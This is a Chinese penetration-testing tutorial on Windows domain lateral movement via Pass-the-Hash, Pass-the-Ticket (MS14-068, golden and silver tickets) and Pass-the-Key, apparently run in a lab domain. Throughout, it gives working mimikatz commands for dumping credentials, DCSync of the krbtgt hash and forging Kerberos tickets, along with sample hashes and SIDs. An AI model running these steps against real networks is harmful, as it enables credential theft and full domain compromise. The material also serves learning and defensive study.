内网渗透 | 4.域横向之PTH&PTT&PTK

0x01 前言

内网渗透系列文章可能不是按照内网常规顺序来写的，想什么写什么

0x02 Pass The Hash

哈希传递攻击是基于NTLM认证的一种攻击方式。哈希传递攻击的利用前提是我们获得了某个用户的密码哈希值，但是解不开明文。这时我们可以利用NTLM认证的一种缺陷，利用用户的密码哈希值来进行NTLM认证。在域环境中，大量计算机在安装时会使用相同的本地管理员账号和密码。因此，如果计算机的本地管理员账号密码相同，攻击者就能使用哈希传递攻击登录内网中的其他机器。

哈希传递攻击适用情况：

• 在工作组环境中：

  Windows Vista 之前的机器，可以使用本地管理员组内用户进行攻击。Windows Vista 之后的机器，只能是administrator用户的哈希值才能进行哈希传递攻击，其他用户(包括管理员用户但是非)也不能使用哈希传递攻击，会提示拒绝访问。

• 在域环境中：

  只能是域管理员组内用户(可以是域管理员组内非administrator用户)的哈希值才能进行哈希传递攻击，攻击成功后，可以访问域内任何一台机器。

• 这类攻击适用于：

  域/工作组环境

  可以获得hash，但是条件不允许对hash爆破

  内网中存在和当前机器相同的密码

在打了补丁后，常规的Pass The Hash已经无法成功，唯独默认的Administrator(SID 500)账号例外，利用这个账号仍可以进行Pass The Hash远程ipc连接。

如果禁用了ntlm认证，PsExec无法利用获得的ntlm hash进行远程连接，但是使用mimikatz还是可以攻击成功。

Mimikatz

它的功能很多，最重要的是能从 lsass.exe进程中获取windows的账号及明文密码——这是以前的事了，微软知道后已经准备了补丁，lsass进程不再保存明文口令。Mimikatz 现在只能读到加密后的密码。

mimikatz的pth功能需要本地管理员权限，这是由它的实现机制决定的，需要先获得高权限进程lsass.exe的信息

privilege::debug
sekurlsa::logonpasswords

# Hash

user:Administrator
domain:GOD
ntlm:8a963371a63944419ec1adf687bb1be5

sekurlsa::pth /user:Administrator /domain:GOD /ntlm:8a963371a63944419ec1adf687bb1be5

可以看到NTML Hash已经对GOD使用，这样的话访问远程主机或服务，就不需要再提供明文密码

除了mimikatz这个工具还有wmiexe，CrackMapExec等工具，等你去发掘！

0x03 Pass The Ticket

票据传递攻击（PTT）是一种使用Kerberos票据代替明文密码或NTLM哈希的方法。PtT最常见的用途可能是使用黄金票据和白银票据，通过PtT访问主机相当简单。

# Kerberos身份验证流程:
https://www.cnblogs.com/zpchcbd/p/11707302.html

kerberos原理：
  打个比方：就好比A需要进入公司办公处，首先需要去门卫处验证是否是这个公司的人(也就是通过AS的认证)；然后通过门卫确认后，拿着门卫的凭证(也就是我们所需要TGT)去办公处里面，这时候我们如果需要去领导办公室查询资料(就是访问Sever)，那么就需要通过办公处的前台去登记，让前台确认我们是否有去查询的资格，当确认我们有资格后会给予凭证(就是ST)，我们就可以拿着这个凭证去领导办公室查询资料了。

借用我们上面的比方：来带入我们kerberos中：

* 首先 Client 向域控制器 DC 请求访问 Server，DC 通过去 AD 活动目录中查找依次区分 Client 来判断 Client 是否可信；
* 认证通过后返回 TGT 给 Client，Client 得到 TGT（Ticket GrantingTicket）；
* Client 继续拿着 TGT 请求 DC 访问 Server，TGS 通过 Client 消息中的 TGT，判断 Client 是否有访问权限；
* 如果有，则给 Client 有访问 Server 的权限 Ticket，也叫 ST（ServiceTicket）；
* Client 得到 Ticket 后，再去访问 Server，且该 Ticket 只针对这一个 Server有效；
* 最终 Server 和 Client 建立通信。

摘自:https://blog.csdn.net/nicai321/article/details/122614894

票据传递攻击：

• 黄金票据
• 白银票据

0x3-1 黄金票据原理：

在 Kerberos 认证中,Client 通过 AS(身份认证服务)认证后,AS 会给 Client 一个Logon Session Key 和 TGT,而 Logon Session Key 并不会保存在 KDC 中，krbtgt 的NTLM Hash 又是固定的,所以只要得到 krbtgt 的 NTLM Hash，就可以伪造 TGT 和Logon Session Key 来进入下一步 Client 与 TGS 的交互。而已有了金票后,就跳过AS 验证,不用验证账户和密码,所以也不担心域管密码修改。

特点：不需要与 AS 进行交互，需要用户 krbtgt 的 Hash。

在讲黄金票据之前先讲：MS14-068

MS14-068是密钥分发中心（KDC）服务中的Windows漏洞。它允许经过身份验证的用户在其Kerberos票证（TGT）中插入任意PAC（表示所有用户权限的结构）。该漏洞位于kdcsvc.dll域控制器的密钥分发中心(KDC)中。用户可以通过呈现具有改变的PAC的Kerberos TGT来获得票证。

# MS14-068.exe 
https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068

先查看是否打补丁(KB3011780)来判断是否存在漏洞

收集域成员的SID与域管账号及域名称：

whoami /all 
whoami /user #只单独查询SID

net time #获取域管账号
net config workstation #获取域信息
nltest /dsgetdc:GOD #获取域管信息

ms14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员 sid -d 域控制器地址

ms14-068.exe -u [email protected] -p hongrisec@2020 -s S-1-5-21-2952760202-1353902439-2381784089-1000 -d OWA.god.org

这里用的是别的环境

在票据未导入前，是无法查看域控的C盘，我们可以使用mimikatz来导入票据

kerberos::purge  #清空票据
kerberos::ptc 票据文件地址 #导入票据
kerberos::list #查看票据

现在就可以访问域控的文件夹了

至于用其他工具反弹cmd可以自己探索！

0x3-2 Golden Ticket(黄金票据)

Golden ticket的作用是可以生成任意用户的tgt,那么问题就来了,是什么条件能够让他生成任意用户的tgt呢？还得要看kerberos认证的过程,在windows认证过程中，客户端将自己的信息发送给KDC,然后KDC使用krbtgt用户密码的hash作为密钥进行加密，生成TGT。

krbtgt只有域控制器上面才有，所以使用黄金凭据意味着你之前拿到过域控制器的权限,黄金凭据可以理解为一个后门。

伪造黄金凭据需要具备下面条件：

• krbtgt用户的hash(就意味着你已经有域控制器权限了)
• 域名称
• 域的SID值
• 要伪造的用户名

privilege::debug
lsadump::dcsync /domain:god.org /user:krbtgt

kerberos::golden /admin:system /domain:god.org /sid:S-1-5-21-2952760202-1353902439-2381784089-1000 /krbtgt:58e91a5ac358d86513ab224312314061 /ticket:ticket.kirbi

kerberos::purge #清除票据
kerberos::ptt 票据地址 #将票据注入内存

成功访问！

0x3-3 Silver Ticket(白银票据)

如果说黄金票据是伪造的 TGT,那么白银票据就是伪造的 ST。在 Kerberos 认证的第三部，Client 带着 ST 和 Authenticator3 向 Server 上的某个服务进行请求，Server 接收到 Client 的请求之后,通过自己的 Master Key 解密 ST,从而获得 Session Key。通过 Session Key 解密 Authenticator3,进而验证对方的身份,验证成功就让 Client 访问 server 上的指定服务了。所以我们只需要知道 Server 用户的 Hash 就可以伪造出一个 ST,且不会经过 KDC,但是伪造的门票只对部分服务起作用。

白银票据这里只是对单一的服务进行授权，利用过程和golden ticket差不多，首先上域控制器中，把机器的ntlm hash(rc4加密) dump下来，然后在普通域用户机器进行伪造权限，进行ptt。

特点：

• 不需要与KDC进行交互；需要server的NTLM hash。

privilege::debug
sekurlsa::logonpasswords

kerberos::golden /domain:god.org /sid:S-1-5-21-2952760202-1353902439-2381784089-1000 /target:owa.god.org /service:cifs /rc4:105c2352f5e8a768ca560cd1950f69b2 /user:liukaifeng01 /ptt

rc4用域控的NTML Hash

成功利用

0x04 Pass The Key

PTK是在域中攻击kerberos认证的一种方式，原理是通过获取用户的aes hmac，通过kerberos认证，可在NTLM认证被禁止的情况下用来实现类似PTH的功能。

在 WinXP/2003/Vista/2008 ，以及未打 KB2871997 补丁之前（AES 不可用或不可替代）的 Win7/2008r2/8/2012 中强制使用 NTLM 哈希，AES 密钥只有在 8.1/2012r2 和打了 kb2871997 补丁的 7/2008r2/8/2012 中才可以替换，在这种情况下，你可以避免使用 NTLM 哈希。

KB2871997：禁止本地管理员账户用于远程连接，这样就无法以本地管理员用户的权限执行wmi、psexec、schtasks、at和访问文件共享。

这个补丁发布后常规的Pass The Hash已经无法成功，唯独默认的 Administrator (SID 500)账号例外，利用这个账号仍可以进行Pass The Hash远程连接，即使administrator修改了名字

但是还可以通过AES密钥来替代NTLM验证进行横向的操作，其实这个补丁挺鸡肋的，不用AES密钥照样也可以用NTLM，只是需要Administrator（SID 500），都拿到机器了，Administrator还不容易吗？这个补丁唯一的好处就是减少存储在内存中的凭据数据，也就是让wdigest协议认证的凭据不会存储在lsass.exe，这样子当你dump lsass.exe的时候你就会发现，wdigest协议中的凭据你就看不到了

privilege::debug
sekurlsa::ekeys

利用Pass The Key

privilege::debug
sekurlsa::pth /user:liukaifeng01 /domain:god.org /aes256:fd272d8259cd443bdf608f5c633ae8e3274ed8e4da3c5a04d9e2ce59807601c0

如果测试失败就尝试安装KB2871997补丁

这里测试成功